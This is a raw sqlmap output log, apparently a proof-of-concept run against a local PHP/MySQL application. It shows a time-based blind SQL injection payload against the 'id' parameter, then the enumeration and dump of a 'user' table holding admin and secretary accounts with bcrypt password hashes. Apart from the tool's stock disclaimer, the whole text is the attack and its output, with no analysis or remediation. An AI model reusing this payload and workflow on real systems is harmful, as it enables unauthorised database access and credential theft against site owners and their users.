         _
 ___ ___| |_____ ___ ___  {1.0-dev-80b9fc4}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:45:49

[12:45:49] [INFO] resuming back-end DBMS 'mysql' 
[12:45:49] [INFO] testing connection to the target URL
[12:45:49] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=70' AND SLEEP(5) AND 'rdzp'='rdzp&mus_id=2
---
[12:45:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[12:45:49] [INFO] fetching columns for table 'user' in database 'conservatory'
[12:45:49] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[12:45:49] [INFO] retrieved: [12:45:49] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:45:54] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
4
[12:45:54] [INFO] retrieved: 
[12:46:05] [INFO] adjusting time delay to 1 second due to good response times
id
[12:46:10] [INFO] retrieved: name
[12:46:24] [INFO] retrieved: password
[12:46:59] [INFO] retrieved: type
[12:47:17] [INFO] fetching entries for table 'user' in database 'conservatory'
[12:47:17] [INFO] fetching number of entries for table 'user' in database 'conservatory'
[12:47:17] [INFO] retrieved: 2
[12:47:19] [INFO] retrieved: 6
[12:47:23] [INFO] retrieved: admin
[12:47:41] [INFO] retrieved: $2y$10$AY9M2OlmkVrdL/ZBX7gYzeolScaQWSxIyREYXm1EFVe.XWfRGNbMa
[12:51:13] [INFO] retrieved: admin
[12:51:31] [INFO] retrieved: 11
[12:51:35] [INFO] retrieved: secretary
[12:52:08] [INFO] retrieved: $2y$10$aqzatK6.Vc4VyiKt.2B/N.EsjrPsLzrLX5HQJ3Gm88U.qKsaZEAgG
[12:55:43] [INFO] retrieved: secretary
[12:56:15] [INFO] analyzing table dump for possible password hashes
Database: conservatory
Table: user
[2 entries]
+----+-----------+-----------+--------------------------------------------------------------+
| id | type      | name      | password                                                     |
+----+-----------+-----------+--------------------------------------------------------------+
| 6  | admin     | admin     | $2y$10$AY9M2OlmkVrdL/ZBX7gYzeolScaQWSxIyREYXm1EFVe.XWfRGNbMa |
| 11 | secretary | secretary | $2y$10$aqzatK6.Vc4VyiKt.2B/N.EsjrPsLzrLX5HQJ3Gm88U.qKsaZEAgG |
+----+-----------+-----------+--------------------------------------------------------------+

[12:56:15] [INFO] table 'conservatory.`user`' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/conservatory/user.csv'
[12:56:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 12:56:15

